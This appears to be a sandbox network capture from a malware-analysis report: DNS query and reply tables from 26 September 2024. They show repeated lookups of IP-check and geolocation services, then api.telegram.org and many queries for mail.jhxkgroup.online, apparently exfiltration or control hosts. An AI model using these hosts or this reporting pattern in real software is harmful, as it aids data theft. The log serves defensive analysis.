                                              Sep 26, 2024 09:19:36.060895920 CEST6492853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:36.067337036 CEST53649288.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:37.896891117 CEST5739053192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:37.908869982 CEST53573908.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:38.588713884 CEST5809553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:38.595184088 CEST53580958.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:38.617883921 CEST5426153192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:38.624263048 CEST53542618.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:39.539434910 CEST6050753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:39.546693087 CEST53605078.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:40.172224998 CEST5044653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:40.178802013 CEST53504468.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:40.181615114 CEST5593953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:40.187988997 CEST53559398.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:40.658905029 CEST4960853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:40.665707111 CEST53496088.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:41.281992912 CEST6148653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:41.288538933 CEST53614868.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:58.353692055 CEST6245353192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:58.405874968 CEST53624538.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:03.525368929 CEST5056853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:03.569721937 CEST53505688.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:15.785312891 CEST6146753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:15.832356930 CEST53614678.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.346084118 CEST6161853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.353182077 CEST53616188.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.353353024 CEST6161853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.360304117 CEST53616188.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.360451937 CEST6161853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.367763042 CEST53616188.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.367913961 CEST6161853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.375001907 CEST53616188.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.375142097 CEST6161853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.402622938 CEST53616188.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.604068041 CEST5442253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.641184092 CEST53544228.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.641385078 CEST5442253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.675951004 CEST53544228.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.676589966 CEST5442253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.683180094 CEST53544228.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.683401108 CEST5442253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.690274000 CEST53544228.8.8.8192.168.2.22
                                              Sep 26, 2024 09:20:58.690412998 CEST5442253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:20:58.697407961 CEST53544228.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:00.328174114 CEST5207453192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:00.336644888 CEST53520748.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:00.336836100 CEST5207453192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:00.343810081 CEST53520748.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:00.343971968 CEST5207453192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:00.350385904 CEST53520748.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:00.350528955 CEST5207453192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:00.357374907 CEST53520748.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:00.357543945 CEST5207453192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:00.365541935 CEST53520748.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:02.923613071 CEST5033753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:02.930648088 CEST53503378.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:02.930986881 CEST5033753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:02.937877893 CEST53503378.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:02.938046932 CEST5033753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:02.944807053 CEST53503378.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:02.944937944 CEST5033753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:02.967027903 CEST53503378.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:02.967175007 CEST5033753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:02.974311113 CEST53503378.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.132601023 CEST6182653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.139451027 CEST53618268.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.139672995 CEST6182653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.146608114 CEST53618268.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.146742105 CEST6182653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.153793097 CEST53618268.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.153917074 CEST6182653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.161292076 CEST53618268.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.161408901 CEST6182653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.168138981 CEST53618268.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.344595909 CEST5632953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.351737976 CEST53563298.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.352052927 CEST5632953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.360160112 CEST53563298.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.360590935 CEST5632953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.367604971 CEST53563298.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.367795944 CEST5632953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.375056028 CEST53563298.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.375183105 CEST5632953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.381688118 CEST53563298.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.568721056 CEST6346953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.654923916 CEST53634698.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.655184031 CEST6346953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.661277056 CEST53634698.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.661813021 CEST6346953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.668488026 CEST53634698.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.668951035 CEST6346953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.675648928 CEST53634698.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:03.676059008 CEST6346953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:03.682908058 CEST53634698.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.170811892 CEST5944753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.177917004 CEST53594478.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.178133965 CEST5944753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.185512066 CEST53594478.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.185710907 CEST5944753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.192739010 CEST53594478.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.192900896 CEST5944753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.199989080 CEST53594478.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.200128078 CEST5944753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.207165956 CEST53594478.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.383172989 CEST5182853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.390434980 CEST53518288.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.390629053 CEST5182853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.397711039 CEST53518288.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.398060083 CEST5182853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.405448914 CEST53518288.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.405949116 CEST5182853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.412259102 CEST53518288.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.412441969 CEST5182853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.419365883 CEST53518288.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.729196072 CEST5340653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.736274958 CEST53534068.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.736429930 CEST5340653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.742820024 CEST53534068.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.742955923 CEST5340653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.750003099 CEST53534068.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.750129938 CEST5340653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.756540060 CEST53534068.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.756659031 CEST5340653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.763091087 CEST53534068.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.943656921 CEST5634553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.950901031 CEST53563458.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.951210022 CEST5634553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.958105087 CEST53563458.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.958583117 CEST5634553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.965656996 CEST53563458.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.965799093 CEST5634553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.972901106 CEST53563458.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:07.973226070 CEST5634553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:07.980240107 CEST53563458.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:09.103986025 CEST5187053192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:09.276721001 CEST53518708.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:09.276947975 CEST5187053192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:09.285681009 CEST53518708.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:09.285861969 CEST5187053192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:09.292628050 CEST53518708.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:09.292778969 CEST5187053192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:09.299113035 CEST53518708.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:09.299232006 CEST5187053192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:09.306920052 CEST53518708.8.8.8192.168.2.22
                                              Sep 26, 2024 09:21:10.613162041 CEST6500953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:21:10.622241974 CEST53650098.8.8.8192.168.2.22
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 26, 2024 09:19:26.586587906 CEST192.168.2.228.8.8.80x247cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.767976999 CEST192.168.2.228.8.8.80xd0e7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:27.556958914 CEST192.168.2.228.8.8.80xbebaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.469259977 CEST192.168.2.228.8.8.80x67c9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.478178978 CEST192.168.2.228.8.8.80xdd2dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:30.218724012 CEST192.168.2.228.8.8.80xf6d9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.247973919 CEST192.168.2.228.8.8.80xc0cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.259965897 CEST192.168.2.228.8.8.80xda4cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.743609905 CEST192.168.2.228.8.8.80xf59eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.393208981 CEST192.168.2.228.8.8.80x9708Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.402793884 CEST192.168.2.228.8.8.80xc760Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.324820042 CEST192.168.2.228.8.8.80xf848Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.992482901 CEST192.168.2.228.8.8.80xa4d3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:34.001797915 CEST192.168.2.228.8.8.80xfc7aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:35.393383026 CEST192.168.2.228.8.8.80x14bdStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.052402973 CEST192.168.2.228.8.8.80x4c04Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.060895920 CEST192.168.2.228.8.8.80x7205Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:37.896891117 CEST192.168.2.228.8.8.80x9c7eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.588713884 CEST192.168.2.228.8.8.80xe37fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.617883921 CEST192.168.2.228.8.8.80xa3d1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:39.539434910 CEST192.168.2.228.8.8.80x7530Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.172224998 CEST192.168.2.228.8.8.80xa9b5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.181615114 CEST192.168.2.228.8.8.80xbe6eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.658905029 CEST192.168.2.228.8.8.80xd5c4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:41.281992912 CEST192.168.2.228.8.8.80x14e2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:58.353692055 CEST192.168.2.228.8.8.80x4102Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:03.525368929 CEST192.168.2.228.8.8.80xb364Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:15.785312891 CEST192.168.2.228.8.8.80x77cbStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.346084118 CEST192.168.2.228.8.8.80x4336Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.353353024 CEST192.168.2.228.8.8.80x4336Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.360451937 CEST192.168.2.228.8.8.80x4336Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.367913961 CEST192.168.2.228.8.8.80x4336Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.375142097 CEST192.168.2.228.8.8.80x4336Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.604068041 CEST192.168.2.228.8.8.80xbf35Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.641385078 CEST192.168.2.228.8.8.80xbf35Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.676589966 CEST192.168.2.228.8.8.80xbf35Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.683401108 CEST192.168.2.228.8.8.80xbf35Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.690412998 CEST192.168.2.228.8.8.80xbf35Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.328174114 CEST192.168.2.228.8.8.80x7afStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.336836100 CEST192.168.2.228.8.8.80x7afStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.343971968 CEST192.168.2.228.8.8.80x7afStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.350528955 CEST192.168.2.228.8.8.80x7afStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.357543945 CEST192.168.2.228.8.8.80x7afStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.923613071 CEST192.168.2.228.8.8.80x6efeStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.930986881 CEST192.168.2.228.8.8.80x6efeStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.938046932 CEST192.168.2.228.8.8.80x6efeStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.944937944 CEST192.168.2.228.8.8.80x6efeStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.967175007 CEST192.168.2.228.8.8.80x6efeStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.132601023 CEST192.168.2.228.8.8.80x616cStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.139672995 CEST192.168.2.228.8.8.80x616cStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.146742105 CEST192.168.2.228.8.8.80x616cStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.153917074 CEST192.168.2.228.8.8.80x616cStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.161408901 CEST192.168.2.228.8.8.80x616cStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.344595909 CEST192.168.2.228.8.8.80xd70aStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.352052927 CEST192.168.2.228.8.8.80xd70aStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.360590935 CEST192.168.2.228.8.8.80xd70aStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.367795944 CEST192.168.2.228.8.8.80xd70aStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.375183105 CEST192.168.2.228.8.8.80xd70aStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.568721056 CEST192.168.2.228.8.8.80xef90Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.655184031 CEST192.168.2.228.8.8.80xef90Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.661813021 CEST192.168.2.228.8.8.80xef90Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.668951035 CEST192.168.2.228.8.8.80xef90Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.676059008 CEST192.168.2.228.8.8.80xef90Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.170811892 CEST192.168.2.228.8.8.80x5956Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.178133965 CEST192.168.2.228.8.8.80x5956Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.185710907 CEST192.168.2.228.8.8.80x5956Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.192900896 CEST192.168.2.228.8.8.80x5956Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.200128078 CEST192.168.2.228.8.8.80x5956Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.383172989 CEST192.168.2.228.8.8.80x44e3Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.390629053 CEST192.168.2.228.8.8.80x44e3Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.398060083 CEST192.168.2.228.8.8.80x44e3Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.405949116 CEST192.168.2.228.8.8.80x44e3Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.412441969 CEST192.168.2.228.8.8.80x44e3Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.729196072 CEST192.168.2.228.8.8.80x1a4dStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.736429930 CEST192.168.2.228.8.8.80x1a4dStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.742955923 CEST192.168.2.228.8.8.80x1a4dStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.750129938 CEST192.168.2.228.8.8.80x1a4dStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.756659031 CEST192.168.2.228.8.8.80x1a4dStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.943656921 CEST192.168.2.228.8.8.80xf11bStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.951210022 CEST192.168.2.228.8.8.80xf11bStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.958583117 CEST192.168.2.228.8.8.80xf11bStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.965799093 CEST192.168.2.228.8.8.80xf11bStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.973226070 CEST192.168.2.228.8.8.80xf11bStandard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.103986025 CEST192.168.2.228.8.8.80x7ef5Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.276947975 CEST192.168.2.228.8.8.80x7ef5Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.285861969 CEST192.168.2.228.8.8.80x7ef5Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.292778969 CEST192.168.2.228.8.8.80x7ef5Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.299232006 CEST192.168.2.228.8.8.80x7ef5Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:10.613162041 CEST192.168.2.228.8.8.80x3468Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 26, 2024 09:19:26.715449095 CEST8.8.8.8192.168.2.220x247cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.715449095 CEST8.8.8.8192.168.2.220x247cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.715449095 CEST8.8.8.8192.168.2.220x247cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.715449095 CEST8.8.8.8192.168.2.220x247cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.715449095 CEST8.8.8.8192.168.2.220x247cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.715449095 CEST8.8.8.8192.168.2.220x247cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.776418924 CEST8.8.8.8192.168.2.220xd0e7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.776418924 CEST8.8.8.8192.168.2.220xd0e7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.776418924 CEST8.8.8.8192.168.2.220xd0e7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.776418924 CEST8.8.8.8192.168.2.220xd0e7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.776418924 CEST8.8.8.8192.168.2.220xd0e7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:26.776418924 CEST8.8.8.8192.168.2.220xd0e7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:27.566807032 CEST8.8.8.8192.168.2.220xbebaNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:27.566807032 CEST8.8.8.8192.168.2.220xbebaNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.475591898 CEST8.8.8.8192.168.2.220x67c9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.475591898 CEST8.8.8.8192.168.2.220x67c9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.475591898 CEST8.8.8.8192.168.2.220x67c9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.475591898 CEST8.8.8.8192.168.2.220x67c9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
